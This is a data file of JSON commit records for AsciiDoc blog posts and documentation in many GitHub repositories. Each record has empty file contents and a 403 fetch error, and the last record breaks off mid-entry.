{"commit":"7a39c73f7d4bd880d55cac353b51e82b9d30d53a","subject":"Update 2016-08-09-TP.adoc","message":"Update 2016-08-09-TP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-TP.adoc","new_file":"_posts\/2016-08-09-TP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"052e610d1362c3a17458cb7964fd945edb51dfbc","subject":"Update 2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","message":"Update 
2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","new_file":"_posts\/2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e589ee537b5b2a077fc12b417f7ae47473a62a2b","subject":"Update 2017-05-20-oi.adoc","message":"Update 2017-05-20-oi.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-05-20-oi.adoc","new_file":"_posts\/2017-05-20-oi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76c97c873c1979112bcd212e5ad397f17dd053d9","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74f4cde041a4b12b593f19d9dc9e4d6b78dd0ae3","subject":"Include folder is duplicated everywhere","message":"Include folder is duplicated everywhere\n\nIntroduce `:includedir:`.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25844f4260e8b7b02c8be371045a4b2ce42e36df","subject":"Update 2015-09-23-Story-of-my-Life.adoc","message":"Update 2015-09-23-Story-of-my-Life.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Story-of-my-Life.adoc","new_file":"_posts\/2015-09-23-Story-of-my-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d64f6c8d439c500556b84d013ff3d4dc74d71f6","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"278c0d2437f33ae66131138f31895dc7485d7068","subject":"new release","message":"new 
release\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-10-03-release.adoc","new_file":"content\/news\/2017-10-03-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3224cf63b6564396a7b7619a23a85a05210bad47","subject":"Update 2016-08-17-The-Dangers-of-Multirepo.adoc","message":"Update 2016-08-17-The-Dangers-of-Multirepo.adoc","repos":"MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io","old_file":"_posts\/2016-08-17-The-Dangers-of-Multirepo.adoc","new_file":"_posts\/2016-08-17-The-Dangers-of-Multirepo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MatanRubin\/MatanRubin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff1530592eea940fead21f5b83da8bf638c694d8","subject":"Docs: Fix indentation in has-child-query.asciidoc (#23565)","message":"Docs: Fix indentation in has-child-query.asciidoc (#23565)\n\n","repos":"glefloch\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,winstonewert\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,nazarewk\/elasticsearch,Helen-Zhao\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,a2lin\/elasticsearch,LeoYao\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,LeoYao\/elasticsearch,ZTE-PaaS\/elasticsearch,mortonsykes\/elasticsearch,kalimatas\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra,markwalkom\/elasticsearch,LewayneNaidoo\/elasticsearch,kalimatas\/elasticsearch,bawse\/elasticsearch,Shepard1212\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,masaruh\/elasticsearch,vroyer\/elasticassandra,artnowo\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,nazarewk\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,JackyMai\/elasticsearch,a2lin\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,bawse\/elasticsearch,maddin2016\/elasticsearch,Helen-Zhao\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,qwerty4030\/elasticsearch,naveenhooda2000\/elasticsearch,mjason3\/elasticsearch,bawse\/elasticsearch,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,StefanGor\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,jprante\/elasticsearch,uschindler\/elasticsearch,winstonewert\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,kalimatas\/elasticsearch,LewayneNaidoo\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,
jimczi\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,coding0011\/elasticsearch,Shepard1212\/elasticsearch,njlawton\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,artnowo\/elasticsearch,artnowo\/elasticsearch,nezirus\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,fernandozhu\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,vroyer\/elassandra,scottsom\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,scorpionvicky\/elasticsearch,Shepard1212\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,StefanGor\/elasticsearch,fernandozhu\/elasticsearch,bawse\/elasticsearch,naveenhooda2000\/elasticsearch,LewayneNaidoo\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,nknize\/elasticsearch,C-Bish\/elasticsearch,winstonewert\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,JSCooke\/elasticsearch,Shepard1212\/elasticsearch,markwalkom\/elasticsearch,nazarewk\/elasticsearch,brandonkearby\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,scottsom\/elasticsearch,a2lin\/elasticsearch,nazarewk\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,C-Bish\/elasticsearch,bawse\/elasticsearch,umeshdangat\/elasticsearch,fernandozhu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,jprante\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mortonsykes\/elasticsearch,HonzaKral\/elasticsearch,sneivandt\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,vroyer\/elassandra,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,JackyMai\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,glefloch\/elasticsearch,gfyoung\/elasticsearch,njlawton\/elasticsearch,uschindler\/elasticsearch,ZTE-PaaS\/elasticsearch,Stacey-Gammon\/elasticsearch,MisterAndersen\/elasticsearch,JackyMai\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,StefanGor\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,Helen-Zhao\/elasticsearch,nknize\/elasticsearch,fernandozhu\/elasticsearch,C-Bish\/elasticsearch,robin13\/elasticsearch,LewayneNaidoo\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,Shepard1212\/elasticsearch,Helen-Zhao\/elasticsearch,JackyMai\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,ZTE-PaaS\/elasticsearch,mortonsykes\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,usc
hindler\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,fernandozhu\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,mjason3\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,IanvsPoplicola\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,brandonkearby\/elasticsearch,naveenhooda2000\/elasticsearch,MisterAndersen\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,jprante\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,ZTE-PaaS\/elasticsearch,glefloch\/elasticsearch,alexshadow007\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,a2lin\/elasticsearch,pozhidaevak\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,pozhidaevak\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,wenpos\/elasticsearch,masaruh\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,wangtuo\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/reference\/query-dsl\/has-child-query.asciidoc","new_file":"docs\/reference\/query-dsl\/has-child-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb22dcfd3f95a36bae3425fd370a8e433cd7a3ad","subject":"olfs: GSOC 2019 1st draft","message":"olfs: GSOC 2019 1st draft\n","repos":"OPENDAP\/olfs,OPENDAP\/olfs,OPENDAP\/olfs,OPENDAP\/olfs,OPENDAP\/olfs,OPENDAP\/olfs","old_file":"resources\/gsoc\/ifh.adoc","new_file":"resources\/gsoc\/ifh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OPENDAP\/olfs.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"2d1bff216c53faa4b92d31e1a3ec0f1b76ec976b","subject":"Update 2014-07-17-Give-it-back-to-the-community.adoc","message":"Update 2014-07-17-Give-it-back-to-the-community.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-07-17-Give-it-back-to-the-community.adoc","new_file":"_posts\/2014-07-17-Give-it-back-to-the-community.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"444e2a62968f7718520d74fdab2e0d0aa0158344","subject":"add Ch2_HowToWrite\/promise-all.adoc","message":"add 
Ch2_HowToWrite\/promise-all.adoc\n","repos":"tangjinzhou\/promises-book,cqricky\/promises-book,liubin\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,cqricky\/promises-book,purepennons\/promises-book,genie88\/promises-book,dieface\/promises-book,liyunsheng\/promises-book,oToUC\/promises-book,purepennons\/promises-book,genie88\/promises-book,oToUC\/promises-book,mzbac\/promises-book,lidasong2014\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,sunfurong\/promise,wenber\/promises-book,liubin\/promises-book,cqricky\/promises-book,liubin\/promises-book,mzbac\/promises-book,mzbac\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,wenber\/promises-book,sunfurong\/promise,purepennons\/promises-book,sunfurong\/promise,tangjinzhou\/promises-book,liyunsheng\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,wangwei1237\/promises-book,xifeiwu\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book","old_file":"Ch2_HowToWrite\/promise-all.adoc","new_file":"Ch2_HowToWrite\/promise-all.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e7b7174025d9e1f392ef3cff038f55c7f5dccd8","subject":"y2b create post A Cool Desk Gadget Under $30","message":"y2b create post A Cool Desk Gadget Under $30","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-06-A-Cool-Desk-Gadget-Under-30.adoc","new_file":"_posts\/2016-06-06-A-Cool-Desk-Gadget-Under-30.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ead4f22bb055b6a6339ed93702145ed0adecc656","subject":"Publish 2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","message":"Publish 2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","new_file":"2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"192cffc3be0a8402ae396985683697bf61a5baf0","subject":"Update 2016-10-07-The-5-types-of-Millennials-In-The-World.adoc","message":"Update 2016-10-07-The-5-types-of-Millennials-In-The-World.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-07-The-5-types-of-Millennials-In-The-World.adoc","new_file":"_posts\/2016-10-07-The-5-types-of-Millennials-In-The-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0a01df938467a8ad78a597827f62ca56140f4b7","subject":"Update 
2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","message":"Update 2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf8e07d8069ec777513fde0c21b8573adfd2a9fc","subject":"create post I've Never Tried Anything Like It...","message":"create post I've Never Tried Anything Like It...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Ive-Never-Tried-Anything-Like-It....adoc","new_file":"_posts\/2018-02-26-Ive-Never-Tried-Anything-Like-It....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a48e8ef59b825d5bb22c82045e3c640c389c3df1","subject":"Added best-practices section","message":"Added best-practices section\n\n`Handling multiple stages` and `Integrating external Services` is close\nto being finalized and will be made available tomorrow\n","repos":"wombat\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"best-practices\/readme.adoc","new_file":"best-practices\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wombat\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f1271e9e446c7e2d5a7b5c908f4d920b0c89394","subject":"dmr demo on wildfly","message":"dmr demo on wildfly\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"cli\/dmr-demo\/README.adoc","new_file":"cli\/dmr-demo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f878089dec6c03090efbcc79b08edbfbffb7620","subject":"Update components-grid.asciidoc (#9813)","message":"Update components-grid.asciidoc (#9813)\n\nUpdates related to #9810 ","repos":"Darsstar\/framework,asashour\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework","old_file":"documentation\/components\/components-grid.asciidoc","new_file":"documentation\/components\/components-grid.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"699ab092315f83ac42d63c2eaaecd0ce50cba42e","subject":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","message":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4508c41c490f66254d3445d0868be1b1cae90420","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0ddd4a6229f88e85144ab202480667f3fa9ee85","subject":"Update 2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extesion.adoc","message":"Update 2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extesion.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extesion.adoc","new_file":"_posts\/2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extesion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bebcc5644f7be14e16fa73485f9c36b08a862674","subject":"Update 2016-12-18-About-Me.adoc","message":"Update 2016-12-18-About-Me.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-About-Me.adoc","new_file":"_posts\/2016-12-18-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5129d558f9810ce6b1a68b49c11b921d73724df6","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/on_obsession_with_numbers.adoc","new_file":"content\/writings\/on_obsession_with_numbers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} 
{"commit":"9ee141a2e417b05184c14796a599a3c79945762d","subject":"Release Candidate post","message":"Release Candidate post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-28-release-candidate.adoc","new_file":"content\/news\/2017-07-28-release-candidate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e2f78e67eb533dfc783c30b29d691a3841178cc9","subject":"y2b create post iPhone Camera Transformer!","message":"y2b create post iPhone Camera Transformer!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-03-iPhone-Camera-Transformer.adoc","new_file":"_posts\/2016-03-03-iPhone-Camera-Transformer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd2099844d7c5fba70591853202dc9bd655aa5b8","subject":"Update 2016-12-30-Episode-82-Last-Gasp-2016.adoc","message":"Update 2016-12-30-Episode-82-Last-Gasp-2016.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-12-30-Episode-82-Last-Gasp-2016.adoc","new_file":"_posts\/2016-12-30-Episode-82-Last-Gasp-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10256b0ce7d4584bc506370a088d94e63853c59f","subject":"Renamed '_posts\/2017-10-20-My-first-post.adoc' to '_posts\/2017-10-20-Easy-start-with-Hub-Press.adoc'","message":"Renamed '_posts\/2017-10-20-My-first-post.adoc' to '_posts\/2017-10-20-Easy-start-with-Hub-Press.adoc'","repos":"severin31\/severin31.github.io,severin31\/severin31.github.io,severin31\/severin31.github.io,severin31\/severin31.github.io","old_file":"_posts\/2017-10-20-Easy-start-with-Hub-Press.adoc","new_file":"_posts\/2017-10-20-Easy-start-with-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/severin31\/severin31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4215205831611f258a18d96ddab92dd049d97164","subject":"add math module","message":"add math module\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"math.adoc","new_file":"math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"92747e1f4a66ceff561cace34b2e462a4eaf5afd","subject":"DBZ-1806 Community newsletter 1\/2020","message":"DBZ-1806 Community newsletter 
